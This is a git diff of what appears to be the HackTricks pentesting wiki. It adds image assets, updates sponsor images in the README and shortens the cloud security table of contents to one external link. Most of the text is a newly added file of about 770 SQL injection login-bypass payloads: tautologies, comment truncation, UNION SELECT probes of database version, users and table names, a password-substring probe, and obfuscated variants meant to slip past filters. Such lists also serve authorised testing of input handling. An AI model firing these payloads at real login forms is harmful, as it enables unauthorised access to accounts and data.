Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (4).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png differ
diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png
new file mode 100644
index 000000000..4e69d4e12
Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png differ
diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png
new file mode 100644
index 000000000..4e69d4e12
Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png differ
diff --git a/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
new file mode 100644
index 000000000..5a03da57f
--- /dev/null
+++ b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
@@ -0,0 +1,771 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+==
+=
+'
+' --
+' #
+' β
+'--
+'/*
+'#
+" --
+" #
+"/*
+' and 1='1
+' and a='a
+ or 1=1
+ or true
+' or ''='
+" or ""="
+1β²) and '1β²='1β
+' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
+" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
+ and 1=1
+ and 1=1β
+' and 'one'='one
+' and 'one'='oneβ
+' group by password having 1=1--
+' group by userid having 1=1--
+' group by username having 1=1--
+ like '%'
+ or 0=0 --
+ or 0=0 #
+ or 0=0 β
+' or 0=0 #
+' or 0=0 --
+' or 0=0 #
+' or 0=0 β
+" or 0=0 --
+" or 0=0 #
+" or 0=0 β
+%' or '0'='0
+ or 1=1
+ or 1=1--
+ or 1=1/*
+ or 1=1#
+ or 1=1β
+' or 1=1--
+' or '1'='1
+' or '1'='1'--
+' or '1'='1'/*
+' or '1'='1'#
+' or '1β²='1
+' or 1=1
+' or 1=1 --
+' or 1=1 β
+' or 1=1--
+' or 1=1;#
+' or 1=1/*
+' or 1=1#
+' or 1=1β
+') or '1'='1
+') or '1'='1--
+') or '1'='1'--
+') or '1'='1'/*
+') or '1'='1'#
+') or ('1'='1
+') or ('1'='1--
+') or ('1'='1'--
+') or ('1'='1'/*
+') or ('1'='1'#
+'or'1=1
+'or'1=1β²
+" or "1"="1
+" or "1"="1"--
+" or "1"="1"/*
+" or "1"="1"#
+" or 1=1
+" or 1=1 --
+" or 1=1 β
+" or 1=1--
+" or 1=1/*
+" or 1=1#
+" or 1=1β
+") or "1"="1
+") or "1"="1"--
+") or "1"="1"/*
+") or "1"="1"#
+") or ("1"="1
+") or ("1"="1"--
+") or ("1"="1"/*
+") or ("1"="1"#
+) or '1β²='1β
+) or ('1β²='1β
+' or 1=1 LIMIT 1;#
+'or 1=1 or ''='
+"or 1=1 or ""="
+' or 'a'='a
+' or a=a--
+' or a=aβ
+') or ('a'='a
+" or "a"="a
+") or ("a"="a
+') or ('a'='a and hi") or ("a"="a
+' or 'one'='one
+' or 'one'='oneβ
+' or uid like '%
+' or uname like '%
+' or userid like '%
+' or user like '%
+' or username like '%
+' or 'x'='x
+') or ('x'='x
+" or "x"="x
+' OR 'x'='x'#;
+'=' 'or' and '=' 'or'
+' UNION ALL SELECT 1, @@version;#
+' UNION ALL SELECT system_user(),user();#
+' UNION select table_schema,table_name FROM information_Schema.tables;#
+admin' and substring(password/text(),1,1)='7
+' and substring(password/text(),1,1)='7
+
+==
+=
+'
+"
+'-- 2
+'/*
+'#
+"-- 2
+" #
+"/*
+'-'
+'&'
+'^'
+'*'
+'='
+0'<'2
+"-"
+"&"
+"^"
+"*"
+"="
+0"<"2
+
+')
+")
+')-- 2
+')/*
+')#
+")-- 2
+") #
+")/*
+')-('
+')&('
+')^('
+')*('
+')=('
+0')<('2
+")-("
+")&("
+")^("
+")*("
+")=("
+0")<("2
+
+'-''-- 2
+'-''#
+'-''/*
+'&''-- 2
+'&''#
+'&''/*
+'^''-- 2
+'^''#
+'^''/*
+'*''-- 2
+'*''#
+'*''/*
+'=''-- 2
+'=''#
+'=''/*
+0'<'2'-- 2
+0'<'2'#
+0'<'2'/*
+"-""-- 2
+"-""#
+"-""/*
+"&""-- 2
+"&""#
+"&""/*
+"^""-- 2
+"^""#
+"^""/*
+"*""-- 2
+"*""#
+"*""/*
+"=""-- 2
+"=""#
+"=""/*
+0"<"2"-- 2
+0"<"2"#
+0"<"2"/*
+
+')-''-- 2
+')-''#
+')-''/*
+')&''-- 2
+')&''#
+')&''/*
+')^''-- 2
+')^''#
+')^''/*
+')*''-- 2
+')*''#
+')*''/*
+')=''-- 2
+')=''#
+')=''/*
+0')<'2'-- 2
+0')<'2'#
+0')<'2'/*
+")-""-- 2
+")-""#
+")-""/*
+")&""-- 2
+")&""#
+")&""/*
+")^""-- 2
+")^""#
+")^""/*
+")*""-- 2
+")*""#
+")*""/*
+")=""-- 2
+")=""#
+")=""/*
+0")<"2-- 2
+0")<"2#
+0")<"2/*
+
+
+'oR'2
+'oR'2'-- 2
+'oR'2'#
+'oR'2'/*
+'oR'2'oR'
+'oR(2)-- 2
+'oR(2)#
+'oR(2)/*
+'oR(2)oR'
+'oR 2-- 2
+'oR 2#
+'oR 2/*
+'oR 2 oR'
+'oR/**/2-- 2
+'oR/**/2#
+'oR/**/2/*
+'oR/**/2/**/oR'
+"oR"2
+"oR"2"-- 2
+"oR"2"#
+"oR"2"/*
+"oR"2"oR"
+"oR(2)-- 2
+"oR(2)#
+"oR(2)/*
+"oR(2)oR"
+"oR 2-- 2
+"oR 2#
+"oR 2/*
+"oR 2 oR"
+"oR/**/2-- 2
+"oR/**/2#
+"oR/**/2/*
+"oR/**/2/**/oR"
+
+'oR'2'='2
+'oR'2'='2'oR'
+'oR'2'='2'-- 2
+'oR'2'='2'#
+'oR'2'='2'/*
+'oR'2'='2'oR'
+'oR 2=2-- 2
+'oR 2=2#
+'oR 2=2/*
+'oR 2=2 oR'
+'oR/**/2=2-- 2
+'oR/**/2=2#
+'oR/**/2=2/*
+'oR/**/2=2/**/oR'
+'oR(2)=2-- 2
+'oR(2)=2#
+'oR(2)=2/*
+'oR(2)=2/*
+'oR(2)=(2)oR'
+'oR'2'='2' LimIT 1-- 2
+'oR'2'='2' LimIT 1#
+'oR'2'='2' LimIT 1/*
+'oR(2)=(2)LimIT(1)-- 2
+'oR(2)=(2)LimIT(1)#
+'oR(2)=(2)LimIT(1)/*
+"oR"2"="2
+"oR"2"="2"oR"
+"oR"2"="2"-- 2
+"oR"2"="2"#
+"oR"2"="2"/*
+"oR"2"="2"oR"
+"oR 2=2-- 2
+"oR 2=2#
+"oR 2=2/*
+"oR 2=2 oR"
+"oR/**/2=2-- 2
+"oR/**/2=2#
+"oR/**/2=2/*
+"oR/**/2=2/**/oR"
+"oR(2)=2-- 2
+"oR(2)=2#
+"oR(2)=2/*
+"oR(2)=2/*
+"oR(2)=(2)oR"
+"oR"2"="2" LimIT 1-- 2
+"oR"2"="2" LimIT 1#
+"oR"2"="2" LimIT 1/*
+"oR(2)=(2)LimIT(1)-- 2
+"oR(2)=(2)LimIT(1)#
+"oR(2)=(2)LimIT(1)/*
+
+'oR true-- 2
+'oR true#
+'oR true/*
+'oR true oR'
+'oR(true)-- 2
+'oR(true)#
+'oR(true)/*
+'oR(true)oR'
+'oR/**/true-- 2
+'oR/**/true#
+'oR/**/true/*
+'oR/**/true/**/oR'
+"oR true-- 2
+"oR true#
+"oR true/*
+"oR true oR"
+"oR(true)-- 2
+"oR(true)#
+"oR(true)/*
+"oR(true)oR"
+"oR/**/true-- 2
+"oR/**/true#
+"oR/**/true/*
+"oR/**/true/**/oR"
+
+'oR'2'LiKE'2
+'oR'2'LiKE'2'-- 2
+'oR'2'LiKE'2'#
+'oR'2'LiKE'2'/*
+'oR'2'LiKE'2'oR'
+'oR(2)LiKE(2)-- 2
+'oR(2)LiKE(2)#
+'oR(2)LiKE(2)/*
+'oR(2)LiKE(2)oR'
+"oR"2"LiKE"2
+"oR"2"LiKE"2"-- 2
+"oR"2"LiKE"2"#
+"oR"2"LiKE"2"/*
+"oR"2"LiKE"2"oR"
+"oR(2)LiKE(2)-- 2
+"oR(2)LiKE(2)#
+"oR(2)LiKE(2)/*
+"oR(2)LiKE(2)oR"
+
+admin
+admin'-- 2
+admin'#
+admin'/*
+admin"-- 2
+admin"#
+ffifdyop
+
+' UniON SElecT 1,2-- 2
+' UniON SElecT 1,2,3-- 2
+' UniON SElecT 1,2,3,4-- 2
+' UniON SElecT 1,2,3,4,5-- 2
+' UniON SElecT 1,2#
+' UniON SElecT 1,2,3#
+' UniON SElecT 1,2,3,4#
+' UniON SElecT 1,2,3,4,5#
+'UniON(SElecT(1),2)-- 2
+'UniON(SElecT(1),2,3)-- 2
+'UniON(SElecT(1),2,3,4)-- 2
+'UniON(SElecT(1),2,3,4,5)-- 2
+'UniON(SElecT(1),2)#
+'UniON(SElecT(1),2,3)#
+'UniON(SElecT(1),2,3,4)#
+'UniON(SElecT(1),2,3,4,5)#
+" UniON SElecT 1,2-- 2
+" UniON SElecT 1,2,3-- 2
+" UniON SElecT 1,2,3,4-- 2
+" UniON SElecT 1,2,3,4,5-- 2
+" UniON SElecT 1,2#
+" UniON SElecT 1,2,3#
+" UniON SElecT 1,2,3,4#
+" UniON SElecT 1,2,3,4,5#
+"UniON(SElecT(1),2)-- 2
+"UniON(SElecT(1),2,3)-- 2
+"UniON(SElecT(1),2,3,4)-- 2
+"UniON(SElecT(1),2,3,4,5)-- 2
+"UniON(SElecT(1),2)#
+"UniON(SElecT(1),2,3)#
+"UniON(SElecT(1),2,3,4)#
+"UniON(SElecT(1),2,3,4,5)#
+
+'||'2
+'||2-- 2
+'||'2'||'
+'||2#
+'||2/*
+'||2||'
+"||"2
+"||2-- 2
+"||"2"||"
+"||2#
+"||2/*
+"||2||"
+'||'2'='2
+'||'2'='2'||'
+'||2=2-- 2
+'||2=2#
+'||2=2/*
+'||2=2||'
+"||"2"="2
+"||"2"="2"||"
+"||2=2-- 2
+"||2=2#
+"||2=2/*
+"||2=2||"
+'||2=(2)LimIT(1)-- 2
+'||2=(2)LimIT(1)#
+'||2=(2)LimIT(1)/*
+"||2=(2)LimIT(1)-- 2
+"||2=(2)LimIT(1)#
+"||2=(2)LimIT(1)/*
+'||true-- 2
+'||true#
+'||true/*
+'||true||'
+"||true-- 2
+"||true#
+"||true/*
+"||true||"
+'||'2'LiKE'2
+'||'2'LiKE'2'-- 2
+'||'2'LiKE'2'#
+'||'2'LiKE'2'/*
+'||'2'LiKE'2'||'
+'||(2)LiKE(2)-- 2
+'||(2)LiKE(2)#
+'||(2)LiKE(2)/*
+'||(2)LiKE(2)||'
+"||"2"LiKE"2
+"||"2"LiKE"2"-- 2
+"||"2"LiKE"2"#
+"||"2"LiKE"2"/*
+"||"2"LiKE"2"||"
+"||(2)LiKE(2)-- 2
+"||(2)LiKE(2)#
+"||(2)LiKE(2)/*
+"||(2)LiKE(2)||"
+
+')oR('2
+')oR'2'-- 2
+')oR'2'#
+')oR'2'/*
+')oR'2'oR('
+')oR(2)-- 2
+')oR(2)#
+')oR(2)/*
+')oR(2)oR('
+')oR 2-- 2
+')oR 2#
+')oR 2/*
+')oR 2 oR('
+')oR/**/2-- 2
+')oR/**/2#
+')oR/**/2/*
+')oR/**/2/**/oR('
+")oR("2
+")oR"2"-- 2
+")oR"2"#
+")oR"2"/*
+")oR"2"oR("
+")oR(2)-- 2
+")oR(2)#
+")oR(2)/*
+")oR(2)oR("
+")oR 2-- 2
+")oR 2#
+")oR 2/*
+")oR 2 oR("
+")oR/**/2-- 2
+")oR/**/2#
+")oR/**/2/*
+")oR/**/2/**/oR("
+')oR'2'=('2
+')oR'2'='2'oR('
+')oR'2'='2'-- 2
+')oR'2'='2'#
+')oR'2'='2'/*
+')oR'2'='2'oR('
+')oR 2=2-- 2
+')oR 2=2#
+')oR 2=2/*
+')oR 2=2 oR('
+')oR/**/2=2-- 2
+')oR/**/2=2#
+')oR/**/2=2/*
+')oR/**/2=2/**/oR('
+')oR(2)=2-- 2
+')oR(2)=2#
+')oR(2)=2/*
+')oR(2)=2/*
+')oR(2)=(2)oR('
+')oR'2'='2' LimIT 1-- 2
+')oR'2'='2' LimIT 1#
+')oR'2'='2' LimIT 1/*
+')oR(2)=(2)LimIT(1)-- 2
+')oR(2)=(2)LimIT(1)#
+')oR(2)=(2)LimIT(1)/*
+")oR"2"=("2
+")oR"2"="2"oR("
+")oR"2"="2"-- 2
+")oR"2"="2"#
+")oR"2"="2"/*
+")oR"2"="2"oR("
+")oR 2=2-- 2
+")oR 2=2#
+")oR 2=2/*
+")oR 2=2 oR("
+")oR/**/2=2-- 2
+")oR/**/2=2#
+")oR/**/2=2/*
+")oR/**/2=2/**/oR("
+")oR(2)=2-- 2
+")oR(2)=2#
+")oR(2)=2/*
+")oR(2)=2/*
+")oR(2)=(2)oR("
+")oR"2"="2" LimIT 1-- 2
+")oR"2"="2" LimIT 1#
+")oR"2"="2" LimIT 1/*
+")oR(2)=(2)LimIT(1)-- 2
+")oR(2)=(2)LimIT(1)#
+")oR(2)=(2)LimIT(1)/*
+')oR true-- 2
+')oR true#
+')oR true/*
+')oR true oR('
+')oR(true)-- 2
+')oR(true)#
+')oR(true)/*
+')oR(true)oR('
+')oR/**/true-- 2
+')oR/**/true#
+')oR/**/true/*
+')oR/**/true/**/oR('
+")oR true-- 2
+")oR true#
+")oR true/*
+")oR true oR("
+")oR(true)-- 2
+")oR(true)#
+")oR(true)/*
+")oR(true)oR("
+")oR/**/true-- 2
+")oR/**/true#
+")oR/**/true/*
+")oR/**/true/**/oR("
+')oR'2'LiKE('2
+')oR'2'LiKE'2'-- 2
+')oR'2'LiKE'2'#
+')oR'2'LiKE'2'/*
+')oR'2'LiKE'2'oR('
+')oR(2)LiKE(2)-- 2
+')oR(2)LiKE(2)#
+')oR(2)LiKE(2)/*
+')oR(2)LiKE(2)oR('
+")oR"2"LiKE("2
+")oR"2"LiKE"2"-- 2
+")oR"2"LiKE"2"#
+")oR"2"LiKE"2"/*
+")oR"2"LiKE"2"oR("
+")oR(2)LiKE(2)-- 2
+")oR(2)LiKE(2)#
+")oR(2)LiKE(2)/*
+")oR(2)LiKE(2)oR("
+admin')-- 2
+admin')#
+admin')/*
+admin")-- 2
+admin")#
+') UniON SElecT 1,2-- 2
+') UniON SElecT 1,2,3-- 2
+') UniON SElecT 1,2,3,4-- 2
+') UniON SElecT 1,2,3,4,5-- 2
+') UniON SElecT 1,2#
+') UniON SElecT 1,2,3#
+') UniON SElecT 1,2,3,4#
+') UniON SElecT 1,2,3,4,5#
+')UniON(SElecT(1),2)-- 2
+')UniON(SElecT(1),2,3)-- 2
+')UniON(SElecT(1),2,3,4)-- 2
+')UniON(SElecT(1),2,3,4,5)-- 2
+')UniON(SElecT(1),2)#
+')UniON(SElecT(1),2,3)#
+')UniON(SElecT(1),2,3,4)#
+')UniON(SElecT(1),2,3,4,5)#
+") UniON SElecT 1,2-- 2
+") UniON SElecT 1,2,3-- 2
+") UniON SElecT 1,2,3,4-- 2
+") UniON SElecT 1,2,3,4,5-- 2
+") UniON SElecT 1,2#
+") UniON SElecT 1,2,3#
+") UniON SElecT 1,2,3,4#
+") UniON SElecT 1,2,3,4,5#
+")UniON(SElecT(1),2)-- 2
+")UniON(SElecT(1),2,3)-- 2
+")UniON(SElecT(1),2,3,4)-- 2
+")UniON(SElecT(1),2,3,4,5)-- 2
+")UniON(SElecT(1),2)#
+")UniON(SElecT(1),2,3)#
+")UniON(SElecT(1),2,3,4)#
+")UniON(SElecT(1),2,3,4,5)#
+')||('2
+')||2-- 2
+')||'2'||('
+')||2#
+')||2/*
+')||2||('
+")||("2
+")||2-- 2
+")||"2"||("
+")||2#
+")||2/*
+")||2||("
+')||'2'=('2
+')||'2'='2'||('
+')||2=2-- 2
+')||2=2#
+')||2=2/*
+')||2=2||('
+")||"2"=("2
+")||"2"="2"||("
+")||2=2-- 2
+")||2=2#
+")||2=2/*
+")||2=2||("
+')||2=(2)LimIT(1)-- 2
+')||2=(2)LimIT(1)#
+')||2=(2)LimIT(1)/*
+")||2=(2)LimIT(1)-- 2
+")||2=(2)LimIT(1)#
+")||2=(2)LimIT(1)/*
+')||true-- 2
+')||true#
+')||true/*
+')||true||('
+")||true-- 2
+")||true#
+")||true/*
+")||true||("
+')||'2'LiKE('2
+')||'2'LiKE'2'-- 2
+')||'2'LiKE'2'#
+')||'2'LiKE'2'/*
+')||'2'LiKE'2'||('
+')||(2)LiKE(2)-- 2
+')||(2)LiKE(2)#
+')||(2)LiKE(2)/*
+')||(2)LiKE(2)||('
+")||"2"LiKE("2
+")||"2"LiKE"2"-- 2
+")||"2"LiKE"2"#
+")||"2"LiKE"2"/*
+")||"2"LiKE"2"||("
+")||(2)LiKE(2)-- 2
+")||(2)LiKE(2)#
+")||(2)LiKE(2)/*
+")||(2)LiKE(2)||("
+' UnION SELeCT 1,2`
+' UnION SELeCT 1,2,3`
+' UnION SELeCT 1,2,3,4`
+' UnION SELeCT 1,2,3,4,5`
+" UnION SELeCT 1,2`
+" UnION SELeCT 1,2,3`
+" UnION SELeCT 1,2,3,4`
+" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md
index 30e9c3cba..b0e4b2d7e 100644
--- a/1911-pentesting-fox.md
+++ b/1911-pentesting-fox.md
@@ -22,7 +22,7 @@ dht udp "DHT Nodes"
![](<.gitbook/assets/image (273).png>)
-![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
InfluxDB
diff --git a/README.md b/README.md
index 3f43b7b96..7d59ec5ea 100644
--- a/README.md
+++ b/README.md
@@ -34,7 +34,7 @@ Here you will find the **typical flow** that **you should follow when pentesting
### [STM Cyber](https://www.stmcyber.com)
-![](<.gitbook/assets/image (642) (1) (1) (1).png>)
+![](<.gitbook/assets/image (638) (2) (1).png>)
[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training.
@@ -72,7 +72,7 @@ Get Access Today:
-[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
+[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more.
@@ -84,7 +84,7 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
### [**INE**](https://ine.com)
-![](.gitbook/assets/ine\_logo-3-.jpg)
+![](<.gitbook/assets/INE\_Logo (3).jpg>)
[**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.**
diff --git a/SUMMARY.md b/SUMMARY.md
index 875c43230..0ed9800a6 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -548,54 +548,9 @@
## β Cloud Security
-* [GCP Security](cloud-security/gcp-security/README.md)
- * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
- * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md)
- * [GCP - Privesc to other Principals](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md)
- * [GCP - Privesc to Resources](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md)
- * [GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation](cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md)
- * [GCP - Compute Enumeration](cloud-security/gcp-security/gcp-compute-enumeration.md)
- * [GCP - Network Enumeration](cloud-security/gcp-security/gcp-network-enumeration.md)
- * [GCP - KMS & Secrets Management Enumeration](cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md)
- * [GCP - Databases Enumeration](cloud-security/gcp-security/gcp-databases-enumeration.md)
- * [GCP - Serverless Code Exec Services Enumeration](cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md)
- * [GCP - Buckets Enumeration](cloud-security/gcp-security/gcp-buckets-enumeration.md)
- * [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md)
- * [GCP - Persistance](cloud-security/gcp-security/gcp-persistance.md)
-* [Workspace Security](cloud-security/workspace-security.md)
-* [Github Security](cloud-security/github-security/README.md)
- * [Basic Github Information](cloud-security/github-security/basic-github-information.md)
-* [Gitea Security](cloud-security/gitea-security/README.md)
- * [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md)
-* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md)
- * [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md)
- * [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)
- * [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md)
- * [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
- * [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md)
- * [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
- * [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md)
- * [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md)
- * [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
- * [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md)
- * [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
- * [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md)
- * [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
- * [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
- * [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
- * [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md)
-* [Concourse](cloud-security/concourse/README.md)
- * [Concourse Architecture](cloud-security/concourse/concourse-architecture.md)
- * [Concourse Lab Creation](cloud-security/concourse/concourse-lab-creation.md)
- * [Concourse Enumeration & Attacks](cloud-security/concourse/concourse-enumeration-and-attacks.md)
-* [CircleCI](cloud-security/circleci.md)
-* [Jenkins](cloud-security/jenkins.md)
-* [Apache Airflow](cloud-security/apache-airflow/README.md)
- * [Airflow Configuration](cloud-security/apache-airflow/airflow-configuration.md)
- * [Airflow RBAC](cloud-security/apache-airflow/airflow-rbac.md)
-* [Atlantis](cloud-security/atlantis.md)
-* [Cloud Security Review](cloud-security/cloud-security-review.md)
-* [AWS Security](cloud-security/aws-security.md)
+* [Pentesting Kubernetes](https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security)
